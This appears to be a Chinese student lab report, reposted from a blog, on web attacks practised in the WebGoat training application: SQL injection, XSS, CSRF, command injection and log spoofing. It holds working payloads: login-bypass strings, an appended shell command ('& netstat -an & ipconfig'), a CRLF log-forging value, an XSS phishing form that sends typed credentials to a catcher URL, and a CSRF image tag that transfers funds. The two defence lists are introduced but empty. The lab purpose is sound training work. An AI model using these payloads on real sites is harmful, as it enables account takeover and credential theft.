所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
sql注入攻击是利用是指利用设计上的漏洞,在目标服务器上运行Sql语句以及进行其他方式的攻击,动态生成Sql语句时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。
比如登录过程,SQL语句一般为:"select id from users where username = ‘"+username +"‘ and password = ‘" + password +"‘",这里的username和password都是我们存取从web表单获得的数据。如果我们在表单中username的输入框中输入‘ or 1=1--。此时我们所要执行的sql语句就变成了select id from users where username = ‘‘ or 1=1-- and password = ‘‘。因为1=1是true,后面 and password = ‘‘被注释掉了。所以这里完全跳过了sql验证。
以上是最经典的一种情况。但在本次实验中,还涉及到了网页对输入字符长度的限制等等,需要修改相应的代码。
由此可见,对SQL注入攻击的防御,主要有:
攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
浏览器自身可以识别简单的XSS攻击字符串,从而阻止简单的XSS攻击;从根本上说,解决办法是消除网站的XSS漏洞,这就需要网站开发者运用转义安全字符等手段。
CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。
严格意义上来说,CSRF 不能分类为注入攻击,因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌,但对于设计不佳的网站,一条正常的链接都能造成 CSRF。
防御的方法可从以下几个角度考虑:
命令注入漏洞允许未经授权的执行操作系统命令。由于命令注入漏洞的存在,应用程序无法正确地验证和消毒,使用时会调用shell的功能。攻击者往往会通过控制这些参数达到欺骗应用程序执行任何系统命令的目的。
原理:在正常的参数提交过程中添加恶意代码以执行某条指令。
Command Injection,在网页上右击选择inspect Element审查网页元素并对源代码进行修改找到复选框表单,在其中任意一览(这里是BackDoors.help)后面添加"& netstat -an &ipconfig
点击View,看到执行命令后的网络端口使用情况和IP地址
注入数字型数据(如:永真式)达到注入的效果。
Numberic SQL Injection,打开审查网页元素,在选中的城市编号Value值中添加or 1=1
通过在日志文件中插入脚本实现欺骗。在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹。
Log Spoofing5218%0d%0aLogin Succeeded for username: admin,利用回车(0D%)和换行符号(%0A)让其在日志中显示
LAB:SQL Injection,打开审查网页元素,对源代码进行修改将password密码框最大长度限制调整为30
任选登录用户(这里为默认的Larry Stooge),输入密码‘ or 1=1 --,登陆成功
跨站脚本攻击是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击.
打开左边栏的Cross-Site Scripting (xss)——Phishing with XSS
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>结果中出现代码中所指定的绿、红、蓝三块div,并在下方出现了用于欺骗用户的提示语“This feature requires account login:”和用户名、密码输入框。
在登录框中输入用户名、密码并点击登录,会像代码中alert提示的,显示被窃取的用户名和密码。
打开Cross-Site Scripting(xxs)——Cross Site Request Forgery(CSRF)
<img src="http://localhost:8080/WebGoat/attack?Screen=497&menu=900&transferFunds=5000" width="1" height="1" />提交后,在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。
原文:https://www.cnblogs.com/zicerain/p/10926816.html